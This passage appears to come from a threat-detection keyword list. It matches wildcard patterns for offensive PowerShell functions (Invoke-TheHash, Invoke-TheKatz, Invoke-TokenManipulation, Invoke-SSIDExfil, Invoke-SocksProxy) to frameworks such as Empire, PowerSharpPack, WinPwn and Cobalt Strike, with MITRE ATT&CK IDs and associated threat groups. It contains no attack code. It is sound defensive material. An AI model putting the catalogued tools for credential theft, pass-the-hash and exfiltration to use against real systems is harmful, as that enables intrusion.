-*Invoke-SmbScanner*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Snaffler*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Snaffler*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-sniffer *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SocksProxy *,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,0,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-SocksProxy*,offensive_tool_keyword,Invoke-SocksProxy,Creates a local or reverse Socks proxy using powershell,T1090 - T1573 - T1059 - T1021,TA0002 - TA0011 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/p3nt4/Invoke-SocksProxy,1,0,N/A,N/A,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-SocksProxy.*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-Spoolsample*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z 
-*Invoke-SpoolSample*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SprayEmptyPassword*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLAudit*,offensive_tool_keyword,AD exploitation cheat sheet,Scan for MSSQL misconfigurations to escalate to System Admin,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-SQLAudit*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLDumpInfo*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLOSCmd -Instance * -Command *,offensive_tool_keyword,AD exploitation cheat sheet,Run command (enables XP_CMDSHELL automatically if required),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A 
-*Invoke-SQLOSCmd.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SQLOSCmd.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SQLOSCmd.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SQLUncPathInjection*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SSHCommand.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SSIDExfil*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-StandIn.*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invokestealthuserhunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-StealthUserHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-StickyNotesExtract*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SystemStartupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-SystemStartupHistoryCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 
-*Invoke-SystemStartupHistoryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Tater.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Tater.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-TcpEndpointsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-TheHash*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. 
Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.ps1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.psd1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.psm1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheKatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-ThirdPartyDriversCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ThreadedFunction*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Thunderfox*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-TmpDavFS*,offensive_tool_keyword,Invoke-TmpDavFS,Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. 
Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.,T1020 - T1059 - T1573 - T1210,TA0002 - TA0011 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/p3nt4/Invoke-TmpDavFS,1,0,N/A,N/A,2,132,27,2021-03-07T19:07:39Z,2018-07-01T13:21:11Z -*Invoke-TokenManipulation*,offensive_tool_keyword,AD exploitation cheat sheet,Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-TokenManipulation*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-TokenManipulation.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Tokenvator*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-UacCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 